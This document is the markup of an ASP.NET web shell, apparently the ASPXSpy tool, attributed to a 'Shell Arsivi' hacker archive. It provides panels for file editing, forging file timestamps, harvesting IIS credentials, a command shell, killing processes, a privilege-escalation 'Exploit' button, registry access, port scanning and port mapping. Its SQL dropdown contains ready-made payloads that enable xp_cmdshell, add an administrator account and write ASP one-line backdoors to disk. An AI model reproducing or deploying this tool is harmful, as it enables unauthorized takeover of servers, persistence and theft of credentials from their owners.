<span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a><asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" ><asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow></asp:Table></div><%--FileEdit--%><div id="vrFA" runat="server"><p>Current File(import new file name and new file)<br/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList></p><p>File Content<br/><textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea></p><p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p></div><%--CloneTime--%><div id="zRyG" runat="server" enableviewstate="false" visible="false"><p>Alter file<br/></p><p>Reference file(fullpath)<br/></p><p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>

Set last modified &raquo;

<p>Current file(fullpath)<br/></p><p><asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>&nbsp;<asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>&nbsp;<asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>&nbsp;<asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/></p><p>CreationTime :LastWriteTime :LastAccessTime :</p><p><asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/></p></div><%--IISSpy--%><div runat="server" id="VNR" visible="false" enableviewstate="false"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"><asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0"><asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow></asp:Table></div><%--Process--%><div runat="server" id="DCbS" visible="false" enableviewstate="false"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"><asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" ><asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow></asp:Table></div><%--CmdShell--%><div runat="server" id="vIac"> <p>CmdPath:<br/> </p> Argument:<br/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/> <div id="tnQRF" runat="server" visible="false" enableviewstate="false"> </div></div><%--Services--%><div runat="server" id="iQxm" visible ="false" enableviewstate="false"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"><asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" ><asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow></asp:Table></div><%--Sysinfo--%><div runat="server" id="ghaB" visible="false" enableviewstate="false"><hr style=" border: 1px solid #ddd;height:0px;"/><ul class="info" id="Bin_Ul_Sys" runat="server"></ul><h2 id="Bin_H2_Mac" runat="server"><hr style=" border: 1px solid #ddd;height:0px;"/><ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul><h2 id="Bin_H2_Driver" runat="server"><hr style=" border: 1px solid #ddd;height:0px;"/><ul class="info" id ="Bin_Ul_Driver" runat="server"></ul></div><%--UserInfo--%><div runat="server" id="xWVQ" visible="false" enableviewstate="false"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"><asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" ></asp:Table></div><%--SuExp--%> <div runat="server" id="APl"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"> <tr align="center"> <td style="width:10%"> <td style="width:20%" align="left">UserName : <td style="width:20%" align="left">PassWord : <td style="width:20%" align="left">Port : <td style="width:10%"> <tr > <td style="width:10%"> <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp; <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/> <div id="UHlA" visible="false" enableviewstate="false" runat="server"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"><tr align="center"><td style="width:30%"><td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre><td style="width:30%"></div></div><%--Reg--%><div id="kkHN" runat="server"><p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p><table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;"><asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" ><asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow><asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow></asp:Table></div><%--PortScan--%><div id="YwLB" runat="server"><p>IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/></p><div id="GBYT" runat="server" visible="false" enableviewstate="false"></div></div><%--DataBase--%><div id="iDgmL" runat="server"><p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p><div id="dQIIF" runat="server"><div id="irTU" runat="server"></div><div id="uXevN" runat="server">Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList></div><table width="200" border="0" cellpadding="0" cellspacing="0"> Run SQL <textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea><asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/><div style="overflow-x:auto;width:950px" ><p><asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid></p></div></div></div><%--PortMap--%><div id="hOWTm" runat="server"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"><tr align="center"><td style="width:5%"><td style="width:20%" align="left">Local Ip : <td style="width:20%" align="left">Local Port : <td style="width:20%" align="left">Remote Ip : <td style="width:20%" align="left">Remote Port : <tr align="center"><td colspan="5"><br/><asp:Button ID="FJE" CssClass="bt" runat="server" Text="MapPort" OnClick="wDZ"/> <asp:Button ID="giX" CssClass="bt" runat="server" Text="ClearAll" OnClick="vJNsE"/> <asp:Button ID="GFsm" CssClass="bt" runat="server" Text="Refresh" OnClick="tYoZ"/></div><%--Search--%><div id="yhv" runat="server"><table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;"><tr align="center"><td style="width:20%" align="left">Keyword<td style="width:60%" align="left"><textarea id="iaMKl" runat="server" class="area" style="width:100%" rows="4"></textarea><td style="width:20%" align="left"> Use Regex<tr align="center"><td style="width:20%" align="left">Replace As<td style="width:60%" align="left"><textarea id="qPe" runat="server" class="area" style="width:100%" rows="4"></textarea><td style="width:20%" align="left"> Replace<tr align="center"><td style="width:20%" align="left">Search FileType<td style="width:60%" align="left"><td style="width:20%" align="left"><asp:DropDownList runat="server" ID="Ven" AutoPostBack="False" CssClass="list"><asp:ListItem Value="name">File Name</asp:ListItem><asp:ListItem Value="content" Selected="True">File Content</asp:ListItem></asp:DropDownList><tr align="center"><td style="width:20%" align="left">Path<td style="width:60%" align="left"><td style="width:20%" align="left"><asp:Button CssClass="bt" id="axy" runat="server" onclick="NBy" Text="Start" /><br/><br/><asp:Table ID="oJiym" runat="server" Width="100%" CellSpacing="0" ><asp:TableRow CssClass="head"><asp:TableCell Width="60%">File Path</asp:TableCell><asp:TableCell Width="20%">Last modified</asp:TableCell><asp:TableCell Width="20%">Size</asp:TableCell></asp:TableRow></asp:Table></div><div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">Copyright &copy; 2006-2009 <a href="http://www.hackerbox.net" target="_blank">Shell Arsivi</a> All Rights Reserved.</div></div>